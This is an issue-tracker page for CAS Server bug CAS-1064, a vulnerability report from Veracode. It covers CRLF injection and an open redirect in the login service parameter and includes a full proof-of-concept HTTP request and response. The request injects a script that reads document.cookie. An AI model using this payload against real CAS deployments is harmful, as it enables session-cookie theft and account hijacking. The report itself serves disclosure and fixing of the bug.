Uploaded image for project: 'CAS Server'
  1. CAS Server
  2. CAS-1064

CAS Service Parameter is Susceptible to CRLF Attacks

    Details

    • Type: Security Bug
    • Status: Resolved
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: 3.4.10
    • Fix Version/s: 3.4.11
    • Component/s: Web
    • Labels:

      Description

      Vulnerability report submitted by Veracode:

      During an application assessment for one of our customers we discovered a vulnerability isn Jasig/CAS. The service is prone to a CRLF injection and an open URL redirection vulnerability. The service parameter of the /cas/login servlet can be used by an attacker to execute arbitrary javascript in the user's browser within the context of the domain the CAS is running on. If CAS is configured to remember users, the CAS cookies (CASPRIVARY/CASTGC) could be stolen since the malicious javascript will be executing under the path specified by the set-cookie. (in this case /cas)
      Below is a login request that was shown to cause javascript execution on a Mozilla browser through use of the CRLF injection. Note that CRLF exploitation techniques vary from browser to browser.
      The open redirect issue is easily seen by simply changing the service parameter to an arbitrary url. Upon successful authentication the user will be redirected to this url.
      The version that was tested was 3.3.5

      POST /cas/login?service=http:%3A%2F%2fwww.veracode.com%0D%0ALocation:%20javascript:%0D%0A%0D%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
      Host: xxxxxxxxxxxxxxxxxx
      User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.22) Gecko/20110905 Ubuntu/10.04 (lucid) Firefox/3.6.22
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
      Accept-Language: en-us,en;q=0.5
      Accept-Encoding: gzip,deflate
      Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
      Keep-Alive: 115
      Proxy-Connection: keep-alive
      Referer: http://xxxxxxxxxxxxxxxxxx/cas/login?service=http:%3A%2F%2fwww.veracode.com%0D%0ALocation:%20javascript:%0D%0A%0D%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E
      Cookie: username=Admin; JSESSIONID=7F0FDB29748B75F2BAF5177E2E63777F
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 75

      username=Admin&password=xxxxxxxx&j_uri=&lt=e1s1&_eventId=submit&login=Sign+In

      HTTP/1.1 302 Moved Temporarily
      Date: Mon, 12 Sep 2011 21:12:01 GMT
      Server: Apache/2.2.3 (CentOS)
      Pragma: no-cache
      Expires: Thu, 01 Jan 1970 00:00:00 GMT
      Cache-Control: no-cache
      Cache-Control: no-store
      Set-Cookie: CASPRIVACY=""; Domain=xxxxxxxx.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/cas
      Set-Cookie: CASTGC=TGT-101-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; Domain=xxxxxxxxx; Path=/cas; Secure
      Location: http://xxxxxxxxxxxxxxxxx/cas/login/http:://www.veracode.com
      Location: javascript:

      <script>alert(document.cookie)</script>?ticket=ST-95-rw9qb************************
      Content-Length: 0
      Connection: close
      Content-Type: text/plain; charset=UTF-8

        Attachments

          Activity

            People

            • Assignee:
              serac Marvin S. Addison
              Reporter:
              serac Marvin S. Addison
            • Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: